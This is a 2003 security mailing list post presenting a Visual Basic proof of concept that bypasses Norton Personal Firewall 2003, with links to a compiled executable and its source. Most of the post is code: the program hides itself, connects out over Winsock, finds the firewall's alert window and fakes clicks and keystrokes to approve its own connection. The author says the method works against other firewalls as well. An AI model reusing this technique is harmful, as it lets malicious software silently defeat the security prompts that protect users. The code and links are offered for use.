Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bug in Norton FireWall 2003

From: Boy Bear <eyal067 () walla co il>
Date: 19 Aug 2003 10:01:42 -0000
In-Reply-To: <20030809081203.24087.qmail () www securityfocus com>


NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip
NortonSRC- http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip



It is the code:


Dim numNoWindows As Integer
Dim CMD1 As Integer
Const MOUSEEVENTF_MOVE = &H1
Const MOUSEEVENTF_LEFTDOWN = &H2
Const MOUSEEVENTF_LEFTUP = &H4
Const MOUSEEVENTF_RIGHTDOWN = &H8
Const MOUSEEVENTF_RIGHTUP = &H10
Const MOUSEEVENTF_MIDDLEDOWN = &H20
Const MOUSEEVENTF_MIDDLEUP = &H40
Const MOUSEEVENTF_WHEEL = &H800
Const MOUSEEVENTF_ABSOLUTE = &H8000

Private Type POINTAPI
X As Long
Y As Long
End Type

Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) 
As Long
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, 
ByVal dX As Long, _
ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

Private Points() As POINTAPI
Private iCount As Long
Private Const KLF_REORDER = &H8
Private Const lang_English = 67699721
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" 
(ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, 
ByVal nCmdShow As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, 
ByVal hWndInsertAfter As Long, _
ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long, 
ByVal wFlags As Long) As Long
Private Const SW_HIDE = 0 ' sent to ShowWindow function
Private Const SW_SHOW = 5 '  sent to ShowWindow function
Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function
Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name
Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL 
As Long, ByVal flags As Long) As Long

Private Sub Command1_Click()
If Winsock2.State <> sckClosed Then Winsock2.Close
Winsock2.Connect
End Sub

Private Sub Command2_Click()
Winsock1.Listen
End Sub

Private Sub Form_Load()
Dim lForm As Long
lForm = Me.hwnd
SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1
X = Command
If X = "" Then
Shell (App.Path & "\" & App.EXEName & ".exe /Connect")
Winsock2.Connect
X = ""
ElseIf X = "/Connect" Then
X = ""
Me.Hide
Timer2.Enabled = True
End If
End Sub
Private Sub Timer2_Timer()
Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
If hwnd = 0 Then
numNoWindows = numNoWindows + 1
If numNoWindows = 150 Then
Timer2.Enabled = False
End
End If
Else
Call ActivateKeyboardLayout(lang_English, KLF_REORDER)
X = Screen.Width * 2.7
Y = Screen.Height * 2.7
mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE + 
MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0
CMD1 = CMD1 + 1
If CMD1 = 1 Then
Timer2.Interval = 300
ElseIf CMD1 = 2 Then
SendKeys "{tab}"
ElseIf CMD1 = 3 Then
SendKeys " "
ElseIf CMD1 = 4 Then
SendKeys "{UP}"
SendKeys "{UP}"
SendKeys "{UP}"
ElseIf CMD1 = 5 Then
SendKeys "{ENTER}"
Timer2.Enabled = False
End
End If
End If
End Sub
Private Sub Winsock2_Connect()

Winsock2.SendData "Msg-Box"

End Sub
Private Sub wHideShow(HideShow As Boolean)

Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
'if not found then..
If hwnd = 0 Then
Exit Sub
End If
'if not hidden - hide, else - show
If HideShow Then
ShowWindow hwnd, SW_SHOW
Else
ShowWindow hwnd, SW_SHOW
End If

End Sub




The Bug can act on the any Firewalls that I recognize (zonealarm, 
BlackICE....)



The full article situated here (in Hebrew):

http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton%
20Firewall%

202003&page=modules/articles/display.php&cat=Security&file=bug%

20in%20Norton%20Firewall%202003&right=modules/articles



BoyBear From BinaryVision ( http://binaryvision.tech.nu )





symantec fix the bug on FireWall and add to "HackTool" in AntiVirus
Previous By Date Next
Previous By Thread Next

Current thread: